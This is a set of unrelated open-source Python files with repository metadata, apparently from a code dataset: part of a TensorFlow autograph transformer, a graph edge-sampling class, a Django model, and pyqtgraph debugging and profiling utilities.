node.body = self._visit_and_reindent(node.body)
return node
def visit_With(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_If(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_While(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_Expr(self, node):
self.generic_visit(node)
if isinstance(node.value, gast.Call):
# Patterns of single function calls, like:
# opt.minimize(loss)
# or:
# tf.py_func(...)
# First, attempt to gate future evaluation of args. If that's not
# possible, gate all remaining statements (and that may fail too, see
      # _visit_and_reindent).
args_scope = anno.getanno(node.value, NodeAnno.ARGS_SCOPE)
# NOTE: We can't guard object attributes because they may not be writable.
# In addition, avoid renaming well-known names.
# TODO(mdan): Move these names into config.
unguarded_names = (qual_names.QN('self'), qual_names.QN('tf'))
guarded_args = tuple(s for s in args_scope.used
if not s.is_composite() and s not in unguarded_names)
# TODO(mdan): Include all arguments which depended on guarded_args too.
# For example, the following will still cause a race:
# tf.assign(a, a + 1)
# b = a + 1
# tf.assign(a, a + 1) # Control deps here should include `b`
# c = b + 1
# Or maybe we should just raise an "unsafe assign" error?
if guarded_args:
# The aliases may need new names to avoid incorrectly making them local.
# TODO(mdan): This is brutal. It will even rename modules - any fix?
need_alias = tuple(
s for s in guarded_args if s not in args_scope.parent.modified)
aliased_new_names = tuple(
qual_names.QN(
self.context.namer.new_symbol(
s.ssf(), args_scope.parent.referenced)) for s in need_alias)
alias_map = dict(zip(need_alias, aliased_new_names))
if len(guarded_args) == 1:
s, = guarded_args
aliased_guarded_args = alias_map.get(s, s)
else:
aliased_guarded_args = gast.Tuple(
[alias_map.get(s, s).ast() for s in guarded_args], None)
template = """
with ag__.utils.control_dependency_on_returns(call):
aliased_guarded_args = ag__.utils.alias_tensors(guarded_args)
"""
control_deps_guard = templates.replace(
template,
call=node.value,
aliased_guarded_args=aliased_guarded_args,
guarded_args=guarded_args)[-1]
else:
alias_map = {}
template = """
with ag__.utils.control_dependency_on_returns(call):
pass
"""
control_deps_guard = templates.replace(template, call=node.value)[-1]
control_deps_guard.body = []
node = control_deps_guard
anno.setanno(node, anno.Basic.INDENT_BLOCK_REMAINDER,
(node.body, alias_map))
return node
# pylint:enable=invalid-name
def transform(node, context):
return SideEffectGuardTransformer(context).visit(node)
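# --- Illustrative sketch (added; not part of the original module) ---
# Schematically, a standalone side-effecting call followed by further
# computation, e.g.
#
#     opt.minimize(loss)
#     x = f(loss)
#
# is rewritten so that the remainder of the block runs under a control
# dependency on the call's return values (names below are schematic; guarded
# arguments may be renamed to aliases produced by alias_tensors):
#
#     with ag__.utils.control_dependency_on_returns(opt.minimize(loss)):
#         loss_1 = ag__.utils.alias_tensors(loss)
#         x = f(loss_1)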
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/converters/side_effect_guards.py
|
Python
|
apache-2.0
| 7,026
| 0.007543
|
import random
from sets import Set
class Network(object):
"""
Network class represents the whole graph that we read from the
    data file. Since we store only the edges, the size of this
    information is much smaller due to the graph sparsity (in general,
    only around 0.1% of all node pairs are connected).
We use the term "linked edges" to denote the edges that two nodes
are connected, "non linked edges", otherwise. If we just say edge,
it means either linked or non-link edge.
The class also contains lots of sampling methods that sampler can utilize.
    This gives a clean separation between the different learners and the data
    layer. By calling the functions within this class, each learner can get
    different types of data.
"""
def __init__(self, data, held_out_ratio):
"""
In this initialization step, we separate the whole data set
into training, validation and testing sets. Basically,
Training -> used for tuning the parameters.
Held-out/Validation -> used for evaluating the current model, avoid over-fitting
, the accuracy for validation set used as stopping criteria
Testing -> used for calculating final model accuracy.
Arguments:
            data:    representation of the whole graph.
            held_out_ratio:  the percentage of data used for validation and testing.
"""
self.__N = data.N # number of nodes in the graph
self.__linked_edges = data.E # all pair of linked edges.
self.__num_total_edges = len(self.__linked_edges) # number of total edges.
self.__held_out_ratio = held_out_ratio # percentage of held-out data size
# Based on the a-MMSB paper, it samples equal number of
# linked edges and non-linked edges.
self.__held_out_size = int(held_out_ratio * len(self.__linked_edges))
# it is used for stratified random node sampling. By default 10
self.__num_pieces = 10
# The map stores all the neighboring nodes for each node, within the training
# set. The purpose of keeping this object is to make the stratified sampling
# process easier, in which case we need to sample all the neighboring nodes
# given the current one. The object looks like this:
# {
# 0: [1,3,1000,4000]
# 1: [0,4,999]
# .............
# 10000: [0,441,9000]
# }
self.__train_link_map = {}
self.__held_out_map = {} # store all held out edges
self.__test_map = {} # store all test edges
# initialize train_link_map
self.__init_train_link_map()
# randomly sample hold-out and test sets.
self.__init_held_out_set()
self.__init_test_set()
def sample_mini_batch(self, mini_batch_size, strategy):
"""
Sample a mini-batch of edges from the training data.
There are four different sampling strategies for edge sampling
1.random-pair sampling
            sample node pairs uniformly at random. This method is an instance of independent
pair sampling, with h(x) equal to 1/(N(N-1)/2) * mini_batch_size
2.random-node sampling
            A set consists of all the pairs that involve one of the N nodes: we first sample one
            of the N nodes, and sample all the edges for that node. h(x) = 1/N
3.stratified-random-pair sampling
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
4.stratified-random-node sampling
            For each node, we define a link set consisting of all its links, and m non-link sets
            that partition its non-links. We first select a random node, and either select its link
            set or sample one of its m non-link sets. h(x) = 1/N if linked set, 1/(Nm) otherwise
Returns (sampled_edges, scale)
        scale equals 1/h(x), ensuring the sampling gives unbiased gradients.
"""
if strategy == "random-pair":
return self.__random_pair_sampling(mini_batch_size)
elif strategy == "random-node":
return self.__random_node_sampling()
elif strategy == "stratified-random-pair":
return self.__stratified_random_pair_sampling(mini_batch_size)
elif strategy == "stratified-random-node":
return self.__stratified_random_node_sampling(10)
else:
print "Invalid sampling strategy, please make sure you are using the correct one:\
[random-pair, random-node, stratified-random-pair, stratified-random-node]"
return None
def get_num_linked_edges(self):
return len(self.__linked_edges)
def get_num_total_edges(self):
return self.__num_total_edges
def get_num_nodes(self):
return self.__N
def get_linked_edges(self):
return self.__linked_edges
def get_held_out_set(self):
return self.__held_out_map
def get_test_set(self):
return self.__test_map
def set_num_pieces(self, num_pieces):
self.__num_pieces = num_pieces
def __random_pair_sampling(self, mini_batch_size):
"""
        Sample a list of edges from the whole training network uniformly, regardless
        of whether they are link or non-link edges. The sampling approach is simple: randomly
        generate one edge and then check whether that edge passes the conditions. The iteration
        continues until we have collected enough (mini_batch_size) edges.
"""
p = mini_batch_size
mini_batch_set = Set() # list of samples in the mini-batch
# iterate until we get $p$ valid edges.
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if firstIdx == secondIdx:
continue
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# the edge should not be in 1)hold_out set, 2)test_set 3) mini_batch_set (avoid duplicate)
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
# great, we put it into the mini_batch list.
mini_batch_set.add(edge)
p -= 1
scale = (self.__N*(self.__N-1)/2)/mini_batch_size
return (mini_batch_set, scale)
def __random_node_sampling(self):
"""
        A set consists of all the pairs that involve one of the N nodes: we first sample one
        of the N nodes, and sample all the edges for that node. h(x) = 1/N
"""
mini_batch_set = Set()
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
for i in range(0, self.__N):
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(nodeId, i), max(nodeId, i))
if edge in self.__held_out_map or edge in self.__test_map \
or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
return (mini_batch_set, self.__N)
def __stratified_random_pair_sampling(self, mini_batch_size):
"""
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
"""
p = mini_batch_size
mini_batch_set = Set()
flag = random.randint(0,1)
if flag == 0:
""" sample mini-batch from linked edges """
while p > 0:
sampled_linked_edges = random.sample(self.__linked_edges, mini_batch_size * 2)
for edge in sampled_linked_edges:
                    if p <= 0:
break
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
p -= 1
return (mini_batch_set, len(self.__linked_edges)/mini_batch_size)
else:
""" sample mini-batch from non-linked edges """
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions:
if edge in self.__linked_edges or edge in self.__held_out_map \
or edge in self.__test_map or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
p -= 1
            return (mini_batch_set, ((self.__N*(self.__N-1))/2 - len(self.__linked_edges))/mini_batch_size)
def __stratified_random_node_sampling(self, num_pieces):
"""
stratified sampling approach gives more attention to link edges (the edge is connected by two
nodes). The sampling process works like this:
a) randomly choose one node $i$ from all nodes (1,....N)
b) decide to choose link edges or non-link edges with (50%, 50%) probability.
c) if we decide to sample link edge:
return all the link edges for the chosen node $i$
else
                sample edges from all non-link edges for node $i$. The number of edges
                we sample equals the number of all non-link edges / num_pieces
"""
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
# decide to sample links or non-links
flag = random.randint(0,1) # flag=0: non-link edges flag=1: link edges
mini_batch_set = Set()
if flag == 0:
""" sample non-link edges """
            # This is an approximation, since the size of self.__train_link_map[nodeId]
            # is much smaller than N.
mini_batch_size = int(self.__N/self.__num_pieces)
p = mini_batch_size
while p > 0:
# because of the sparsity, when we sample $mini_batch_size*2$ nodes, the list likely
# contains at least mini_batch_size valid nodes.
nodeList = random.sample(list(xrange(self.__N)), mini_batch_size * 2)
for neighborId in nodeList:
                    if p <= 0:
break
if neighborId == nodeId:
continue
# check condition, and insert into mini_batch_set if it is valid.
edge = (min(nodeId, neighborId), max(nodeId, neighborId))
if edge in self.__linked_edges or edge in self.__held_out_map or \
edge in self.__test_map or edge in mini_batch_set:
continue
# add it into mini_batch_set
mini_batch_set.add(edge)
p -= 1
return (mini_batch_set, self.__N * self.__num_pieces)
else:
""" sample linked edges """
# return all linked edges
for neighborId in self.__train_link_map[nodeId]:
mini_batch_set.add((min(nodeId, neighborId),max(nodeId, neighborId)))
return (mini_batch_set, self.__N)
def __init_train_link_map(self):
"""
create a set for each node, which contains list of
neighborhood nodes. i.e {0: Set[2,3,4], 1: Set[3,5,6]...}
        This is used for sub-sampling
        later on.
"""
for i in range(0, self.__N):
self.__train_link_map[i] = Set()
for edge in self.__linked_edges:
self.__train_link_map[edge[0]].add(edge[1])
self.__train_link_map[edge[1]].add(edge[0])
def __init_held_out_set(self):
"""
Sample held out set. we draw equal number of
links and non-links from the whole graph.
"""
p = self.__held_out_size/2
# Sample p linked-edges from the network.
if len(self.__linked_edges) < p:
print "There are not enough linked edges that can sample from. \
please use smaller held out ratio."
sampled_linked_edges = random.sample(self.__linked_edges, p)
for edge in sampled_linked_edges:
self.__held_out_map[edge] = True
self.__train_link_map[edge[0]].remove(edge[1])
self.__train_link_map[edge[1]].remove(edge[0])
# sample p non-linked edges from the network
while p > 0:
edge = self.__sample_non_link_edge_for_held_out()
self.__held_out_map[edge] = False
p -= 1
def __init_test_set(self):
"""
sample test set. we draw equal number of samples for
linked and non-linked edges
"""
p = int(self.__held_out_size/2)
# sample p linked edges from the network
while p > 0:
# Because we already used some of the linked edges for held_out sets,
            # here we sample twice as many links and select among them, which
            # is likely to contain p valid linked edges.
sampled_linked_edges = random.sample(self.__linked_edges, 2*p)
for edge in sampled_linked_edges:
                if p <= 0:
break
# check whether it is already used in hold_out set
if edge in self.__held_out_map or edge in self.__test_map:
continue
else:
self.__test_map[edge] = True
self.__train_link_map[edge[0]].remove(edge[1])
self.__train_link_map[edge[1]].remove(edge[0])
p -= 1
# sample p non-linked edges from the network
p = int(self.__held_out_size/2)
while p > 0:
edge = self.__sample_non_link_edge_for_test()
self.__test_map[edge] = False
p -= 1
def __sample_non_link_edge_for_held_out(self):
'''
        Sample one non-link edge for the held-out set from the network. We should make sure the
        edge has not been used already, so we need to check the conditions before we add it into
        the held-out set.
        TODO: add a guard against an infinite loop
'''
while True:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions.
if edge in self.__linked_edges or edge in self.__held_out_map:
continue
return edge
def __sample_non_link_edge_for_test(self):
"""
Sample one non-link edge for test set from the network. We first randomly generate one
edge, then check conditions. If that edge passes all the conditions, return that edge.
        TODO: prevent an infinite loop
"""
while True:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions:
if edge in self.__linked_edges or edge in self.__held_out_map \
or edge in self.__test_map:
continue
return edge
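# --- Illustrative usage sketch (added; not part of the original module) ---
# Network only reads two attributes from the data object: N (the node count)
# and E (the collection of linked edges as (i, j) tuples with i < j). The
# driver below is hypothetical and shows how a sampler would consume a
# mini-batch; `scale` equals 1/h(x) and multiplies the mini-batch gradient to
# keep the stochastic gradient unbiased.
def _demo_sample_mini_batch(data):
    network = Network(data, held_out_ratio=0.1)
    mini_batch, scale = network.sample_mini_batch(64, "stratified-random-node")
    return mini_batch, scale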
|
wenzheli/python_new
|
com/uva/network.py
|
Python
|
gpl-3.0
| 17,149
| 0.012595
|
# -*- coding: utf-8 -*-
from django.db import models
from apps.postitulos.models.EstadoPostitulo import EstadoPostitulo
from apps.postitulos.models.TipoPostitulo import TipoPostitulo
from apps.postitulos.models.PostituloTipoNormativa import PostituloTipoNormativa
from apps.postitulos.models.CarreraPostitulo import CarreraPostitulo
from apps.postitulos.models.AreaPostitulo import AreaPostitulo
from apps.registro.models.Nivel import Nivel
from apps.registro.models.Jurisdiccion import Jurisdiccion
import datetime
"""
Nationally catalogued title (título nomenclado nacional)
"""
class Postitulo(models.Model):
nombre = models.CharField(max_length=255)
tipo_normativa = models.ForeignKey(PostituloTipoNormativa)
normativa = models.CharField(max_length=50)
carrera_postitulo = models.ForeignKey(CarreraPostitulo)
observaciones = models.CharField(max_length=255, null=True, blank=True)
niveles = models.ManyToManyField(Nivel, db_table='postitulos_postitulos_niveles')
areas = models.ManyToManyField(AreaPostitulo, db_table='postitulos_postitulos_areas')
    jurisdicciones = models.ManyToManyField(Jurisdiccion, db_table='postitulos_postitulos_jurisdicciones') # Provinces
    estado = models.ForeignKey(EstadoPostitulo) # Matches the latest state in TituloEstado
class Meta:
app_label = 'postitulos'
ordering = ['nombre']
def __unicode__(self):
return self.nombre
"Sobreescribo el init para agregarle propiedades"
def __init__(self, *args, **kwargs):
super(Postitulo, self).__init__(*args, **kwargs)
self.estados = self.getEstados()
def registrar_estado(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
registro = PostituloEstado(estado = self.estado)
registro.fecha = datetime.date.today()
registro.postitulo_id = self.id
registro.save()
def getEstados(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
try:
estados = PostituloEstado.objects.filter(postitulo = self).order_by('fecha', 'id')
except:
estados = {}
return estados
"Algún título jurisdiccional está asociado al título?"
def asociado_carrera_postitulo_jurisdiccional(self):
from apps.postitulos.models.CarreraPostituloJurisdiccional import CarreraPostituloJurisdiccional
return CarreraPostituloJurisdiccional.objects.filter(postitulo = self).exists()
|
MERegistro/meregistro
|
meregistro/apps/postitulos/models/Postitulo.py
|
Python
|
bsd-3-clause
| 2,464
| 0.007323
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more information.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, pstats, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore, QtGui
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
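# --- Illustrative sketch (added; not part of the original module) ---
# ftrace is applied as an ordinary decorator; entering and leaving the
# decorated function prints indented "start"/"done" lines. The function below
# is hypothetical and exists only to show the usage.
@ftrace
def _demo_traced(x):
    return x * 2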
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
#print prefix+" EMPTY TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""Return a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50]
else:
return obj[:]
elif isinstance(obj, ndarray):
return "<ndarray %s %s>" % (str(obj.dtype), str(obj.shape))
elif hasattr(obj, '__len__'):
if len(obj) > 5:
return "<%s [%s,...]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj[:5]]))
else:
return "<%s [%s]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj]))
else:
return "<%s %s>" % (type(obj).__name__, obj.__class__.__name__)
except:
return str(type(obj))
def refPathString(chain):
"""Given a list of adjacent objects in a reference path, print the 'natural' path
    names (i.e., attribute names, keys, and indexes) that follow from one object to the next."""
s = objString(chain[0])
i = 0
while i < len(chain)-1:
#print " -> ", i
i += 1
o1 = chain[i-1]
o2 = chain[i]
cont = False
if isinstance(o1, list) or isinstance(o1, tuple):
if any([o2 is x for x in o1]):
s += "[%d]" % o1.index(o2)
continue
#print " not list"
if isinstance(o2, dict) and hasattr(o1, '__dict__') and o2 == o1.__dict__:
i += 1
if i >= len(chain):
s += ".__dict__"
continue
o3 = chain[i]
for k in o2:
if o2[k] is o3:
s += '.%s' % k
cont = True
continue
#print " not __dict__"
if isinstance(o1, dict):
try:
if o2 in o1:
s += "[key:%s]" % objString(o2)
continue
except TypeError:
pass
for k in o1:
if o1[k] is o2:
s += "[%s]" % objString(k)
cont = True
continue
#print " not dict"
#for k in dir(o1): ## Not safe to request attributes like this.
#if getattr(o1, k) is o2:
#s += ".%s" % k
#cont = True
#continue
#print " not attr"
if cont:
continue
s += " ? "
sys.stdout.flush()
return s
def objectSize(obj, ignore=None, verbose=False, depth=0, recursive=False):
"""Guess how much memory an object is using"""
ignoreTypes = ['MethodType', 'UnboundMethodType', 'BuiltinMethodType', 'FunctionType', 'BuiltinFunctionType']
ignoreTypes = [getattr(types, key) for key in ignoreTypes if hasattr(types, key)]
ignoreRegex = re.compile('(method-wrapper|Flag|ItemChange|Option|Mode)')
if ignore is None:
ignore = {}
indent = ' '*depth
try:
hash(obj)
hsh = obj
except:
hsh = "%s:%d" % (str(type(obj)), id(obj))
if hsh in ignore:
return 0
ignore[hsh] = 1
try:
size = sys.getsizeof(obj)
except TypeError:
size = 0
if isinstance(obj, ndarray):
try:
size += len(obj.data)
except:
pass
if recursive:
if type(obj) in [list, tuple]:
if verbose:
print(indent+"list:")
for o in obj:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', s)
size += s
elif isinstance(obj, dict):
if verbose:
print(indent+"list:")
for k in obj:
s = objectSize(obj[k], ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', k, s)
size += s
#elif isinstance(obj, QtCore.QObject):
#try:
#childs = obj.children()
#if verbose:
#print indent+"Qt children:"
#for ch in childs:
#s = objectSize(obj, ignore=ignore, verbose=verbose, depth=depth+1)
#size += s
#if verbose:
#print indent + ' +', ch.objectName(), s
#except:
#pass
#if isinstance(obj, types.InstanceType):
gc.collect()
if verbose:
print(indent+'attrs:')
for k in dir(obj):
if k in ['__dict__']:
continue
o = getattr(obj, k)
if type(o) in ignoreTypes:
continue
strtyp = str(type(o))
if ignoreRegex.search(strtyp):
continue
#if isinstance(o, types.ObjectType) and strtyp == "<type 'method-wrapper'>":
#continue
#if verbose:
#print indent, k, '?'
refs = [r for r in gc.get_referrers(o) if type(r) != types.FrameType]
if len(refs) == 1:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
size += s
if verbose:
print(indent + " +", k, s)
#else:
#if verbose:
#print indent + ' -', k, len(refs)
return size
class GarbageWatcher(object):
"""
Convenient dictionary for holding weak references to objects.
Mainly used to check whether the objects have been collect yet or not.
Example:
gw = GarbageWatcher()
gw['objName'] = obj
gw['objName2'] = obj2
gw.check()
"""
def __init__(self):
self.objs = weakref.WeakValueDictionary()
self.allNames = []
def add(self, obj, name):
self.objs[name] = obj
self.allNames.append(name)
def __setitem__(self, name, obj):
self.add(obj, name)
def check(self):
"""Print a list of all watched objects and whether they have been collected."""
gc.collect()
dead = self.allNames[:]
alive = []
for k in self.objs:
dead.remove(k)
alive.append(k)
print("Deleted objects:", dead)
print("Live objects:", alive)
def __getitem__(self, item):
return self.objs[item]
class Profiler(object):
"""Simple profiler allowing measurement of multiple time intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `PYQTGRAPHPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `PYQTGRAPHPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "pyqtgraph." prefix from the module.
"""
_profilers = os.environ.get("PYQTGRAPHPROFILE", None)
_profilers = _profilers.split(",") if _profilers is not None else []
_depth = 0
_msgs = []
disable = False # set this flag to disable all or individual profilers at runtime
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabledProfiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if disabled is True or (disabled == 'env' and len(cls._profilers) == 0):
return cls._disabledProfiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[-1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if disabled == 'env' and func_qualname not in cls._profilers: # don't do anything
return cls._disabledProfiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._markCount = 0
obj._finished = False
obj._firstTime = obj._lastTime = ptime.time()
obj._newMsg("> Entering " + obj._name)
return obj
def __call__(self, msg=None):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._markCount)
self._markCount += 1
newTime = ptime.time()
self._newMsg(" %s: %0.4f ms",
msg, (newTime - self._lastTime) * 1000)
self._lastTime = newTime
def mark(self, msg=None):
self(msg)
def _newMsg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._newMsg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0]%m[1] for m in self._msgs]))
type(self)._msgs = []
def profile(code, name='profile_run', sort='cumulative', num=30):
"""Common-use for cProfile"""
cProfile.run(code, name)
stats = pstats.Stats(name)
stats.sort_stats(sort)
stats.print_stats(num)
return stats
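# --- Illustrative sketch (added; not part of the original module) ---
# profile() is a thin convenience wrapper around cProfile.run plus a pstats
# report; the code string below is arbitrary and only serves as an example.
def _demo_profile():
    return profile("sum(x * x for x in range(100000))", sort="time", num=10)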
#### Code for listing (nearly) all objects in the known universe
#### http://utcc.utoronto.ca/~cks/space/blog/python/GetAllObjects
# Recursively expand slist's objects
# into olist, using seen to track
# already processed objects.
def _getr(slist, olist, first=True):
i = 0
for e in slist:
oid = id(e)
typ = type(e)
if oid in olist or typ is int: ## or e in olist: ## since we're excluding all ints, there is no longer a need to check for olist keys
continue
olist[oid] = e
if first and (i%1000) == 0:
gc.collect()
tl = gc.get_referents(e)
if tl:
